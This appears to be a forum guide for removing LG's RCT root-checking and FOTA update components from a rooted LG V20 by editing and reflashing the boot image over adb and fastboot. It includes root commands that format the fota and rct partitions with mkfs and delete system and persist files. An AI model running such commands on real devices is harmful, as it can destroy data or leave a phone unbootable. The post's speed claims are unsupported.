You can just copy and paste the commands in the Linux terminal.
In the Linux terminal paste:
install: abootimg
Ubuntu: sudo apt-get install abootimg
Arch: yay -S abootimg
install: fastboot & adb
Ubuntu: sudo apt-get install android-tools-adb android-tools-fastboot
Arch: sudo pacman -S android-tools
Reboot phone into twrp. Connect phone via usb cable. In the Linux terminal paste:
sudo su
mkdir /tmp/test
cd /tmp/test
Get your boot.img
adb shell dd if=/dev/block/bootdevice/by-name/boot of=/tmp/boot.img
adb pull /tmp/boot.img /tmp/test
sync
ls
the boot.img should be on your computer in /tmp/test/
You can unplug the usb cable from the phone. But stay in twrp we will need that later.
abootimg -x /tmp/test/boot.img
mkdir /tmp/test/initrd
cd /tmp/test/initrd
cat ../initrd.img | gunzip | cpio -vid
Going to remove rctd and lge_fota updates & comment out LG RCT access also going to comment out lge_handle_panic. And comment out triton service. You should be able to just copy all and paste all at once. Also I found a speed tweak by changing dalvik.vm.dex2oat-Xmx=512m to dalvik.vm.dex2oat-Xmx=256m will increase speed of phone.
rm /tmp/test/initrd/sbin/bnrd
rm /tmp/test/initrd/sbin/rctd
rm /tmp/test/initrd/sbin/lge_fota
sed -i '605 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '964 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '20 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '790 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '1029 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '1057,1058 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '1067 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '10 s/^/#/' /tmp/test/initrd/nonplat_seapp_contexts
sed -i '485 s/^/#/' /tmp/test/initrd/nonplat_property_contexts
sed -i '1343 s/^/#/' /tmp/test/initrd/nonplat_file_contexts
sed -i '129 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '133 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '137 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '141 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '145 s/^/#/' /tmp/test/initrd/init.msm8996_core.rc
sed -i '7,13 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '17 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '19,29 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '32,33 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '83,105 s/^/#/' /tmp/test/initrd/init.elsa.power.rc
sed -i '232,233 s/^/#/' /tmp/test/initrd/init.elsa_core.rc
you can check to make sure it worked with this command
clear
ls /tmp/test/initrd/sbin/bnrd
ls /tmp/test/initrd/sbin/rctd
ls /tmp/test/initrd/sbin/lge_fota
sed -n 605p /tmp/test/initrd/nonplat_file_contexts
sed -n 964p /tmp/test/initrd/nonplat_file_contexts
sed -n 20p /tmp/test/initrd/nonplat_file_contexts
sed -n 790p /tmp/test/initrd/nonplat_file_contexts
sed -n 1029p /tmp/test/initrd/nonplat_file_contexts
sed -n 1057,1058p /tmp/test/initrd/nonplat_file_contexts
sed -n 1067p /tmp/test/initrd/nonplat_file_contexts
sed -n 10p /tmp/test/initrd/nonplat_seapp_contexts
sed -n 485p /tmp/test/initrd/nonplat_property_contexts
sed -n 1343p /tmp/test/initrd/nonplat_file_contexts
sed -n 129p /tmp/test/initrd/init.msm8996_core.rc
sed -n 133p /tmp/test/initrd/init.msm8996_core.rc
sed -n 137p /tmp/test/initrd/init.msm8996_core.rc
sed -n 141p /tmp/test/initrd/init.msm8996_core.rc
sed -n 145p /tmp/test/initrd/init.msm8996_core.rc
sed -n 7,13p /tmp/test/initrd/init.elsa.power.rc
sed -n 17p /tmp/test/initrd/init.elsa.power.rc
sed -n 19,29p /tmp/test/initrd/init.elsa.power.rc
sed -n 32,33p /tmp/test/initrd/init.elsa.power.rc
sed -n 83,105p /tmp/test/initrd/init.elsa.power.rc
sed -n 232,233p /tmp/test/initrd/init.elsa_core.rc
This is what it should look like. If not, then do not flash the modded myboot.img. I am not 100% sure all Lgv20 boot images are the same. I am 99% sure they should be the same, but just in case.
ls: cannot access '/tmp/test/initrd/sbin/bnrd': No such file or directory
ls: cannot access '/tmp/test/initrd/sbin/rctd': No such file or directory
ls: cannot access '/tmp/test/initrd/sbin/lge_fota': No such file or directory
#/dev/block/platform/.*/by-name/rct u:object_r:rct_block_device:s0
#/dev/rct u:object_r:rct_device:s0
#/(system/vendor|vendor)/bin/triton u:object_r:triton_exec:s0
#/sys/devices/system/cpu/triton(/.*)? u:object_r:sysfs_triton:s0
#/dev/triton:io u:object_r:triton_device:s0
#/dev/socket/bnrd u:object_r:bnrd_socket:s0
#/dev/socket/ccmd u:object_r:ccmd_socket:s0
#/system/bin/ccmd u:object_r:ccmd_exec:s0
#user=_app seinfo=platform name=com.lge.rctprovider domain=platform_app type=app_data_file
#sys.lge.rooted u:object_r:system_prop:s0
#/sys/module/lge_handle_panic/parameters/gen_modem_panic u:object_r:sysfs_gen_modem_panic:s0
# write /sys/module/lge_handle_panic/parameters/cancel_boot_lockup_detect 1
# write /sys/module/lge_handle_panic/parameters/pause_boot_lockup_detect 1
# write /sys/module/lge_handle_panic/parameters/pause_boot_lockup_detect 0
# write /sys/module/lge_handle_panic/parameters/cancel_boot_lockup_detect 1
# write /sys/module/lge_handle_panic/parameters/powerctl_lockup_detect ${sys.powerctl}
#service triton /system/vendor/bin/triton
# class main
# user root
# group system
# socket triton-client stream 660 system system
# disabled
# oneshot
# start triton
# write /sys/devices/system/cpu/triton/debug 16
# write /sys/devices/system/cpu/triton/enable 1
# write /sys/devices/system/cpu/triton/enforce 0
# write /sys/devices/system/cpu/triton/cur_policy 0
# chown system system /sys/devices/system/cpu/triton/enable
# chmod 664 /sys/devices/system/cpu/triton/enable
# chmod 600 /sys/devices/system/cpu/triton/aevents
# chmod 600 /sys/devices/system/cpu/triton/bevents
# chown system system /sys/devices/system/cpu/triton/cur_policy
# chmod 664 /sys/devices/system/cpu/triton/cur_policy
# chmod 664 /sys/devices/system/cpu/triton/debug
# chown system system /sys/devices/system/cpu/triton/enable
# chmod 644 /sys/devices/system/cpu/triton/enable
#service fg-dump /vendor/bin/sh /vendor/bin/fg_dump.sh 10 /data/logger/fg.log
# user root
# group root system
# class main
# disabled
# oneshot
#on property:persist.service.fg.enable=0
# stop fg-dump
#on property:persist.service.fg.enable=1
# restart fg-dump
#on property:persist.service.fg.enable=2
# restart fg-dump
#on property:persist.service.fg.enable=3
# restart fg-dump
#on property:persist.service.fg.enable=4
# restart fg-dump
#on property:persist.service.fg.enable=5
# restart fg-dump
#on property:persist.service.fg.enable=6
# restart fg-dump
#on property:persist.service.fg.enable=99
# restart fg-dump
# setprop ro.ssbd.session /dev/block/bootdevice/by-name/eksst
# export HALLIC_STATUS_PATH /sys/class/switch/smartcover/state
continue making the myboot.img
find . | cpio --create --format='newc' | gzip > ../myinitd.img
cd /tmp/test
nano bootimg.cfg
delete the first line move everything up one line
bootsize = 0x19b15d3
ctrl-x y enter
make the modded myboot.img file
abootimg --create myboot.img -f bootimg.cfg -k zImage -r myinitd.img
plug usb cable back into phone. Phone should still be in twrp.
Going to write all zeros to fota and rct device. Updates and LG RCT devices we don't need them. And going to remvoe the dumpstate file it saves the logcat logs to the eMMC drive and slows down the phone a lot. The logcat files will still be saved to ram up to 4M but they will be deleted when you restart or it runs out of ram. This will speed up the phone removing dumpstate. Also there is a speed tweak need to change five lines in the build.prop file.
Note: If you have already used Auto_Debloat you may get some error messages file not found that's okay. It just means Auto_Debloat took care of the files for you.
mkfs.ntfs /dev/block/bootdevice/by-name/fota
mkfs.fat /dev/block/bootdevice/by-name/rct
adb shell umount -l /system
adb shell mount /system
adb shell rm /system/vendor/bin/subsystem_ramdump
adb shell rm /system/bin/dumpstate
adb shell rm /system/etc/init/dumpstate.rc
adb shell rm /system/bin/ccmd
adb shell rm /system/vendor/bin/triton
adb shell rm /system/vendor/bin/fg_dump.sh
adb shell mount /persist
adb shell rm /persist/rct
adb shell rm /persist/rct.cfg
adb shell umount -l /persist
adb shell umount -l /system
wipe dalvik cache and cache
reboot phone into bootloader aka fastboot from twrp
fastboot flash boot myboot.img
fastboot reboot
exit out of root user
exit
You can unplug usb cable now done.
And that is what I did to remove LG RCT from my Lgv20 phone. One thing to note is that you can not flash a new kernel to the boot.img or you will loose the modded boot.img everything will be reset back to default. If you need to flash a Kernel then just mod the boot.img again afterwards.
If for some reason your phone does not boot anymore, we are going to flash the original boot.img
Power off the Lgv20, or remove battery. Hold volume down while plugging in the usb cable.
sudo su
cd /tmp/test
fastboot flash boot boot.img
fastboot reboot
exit out of root user
exit
done
reserved

Categories

Resources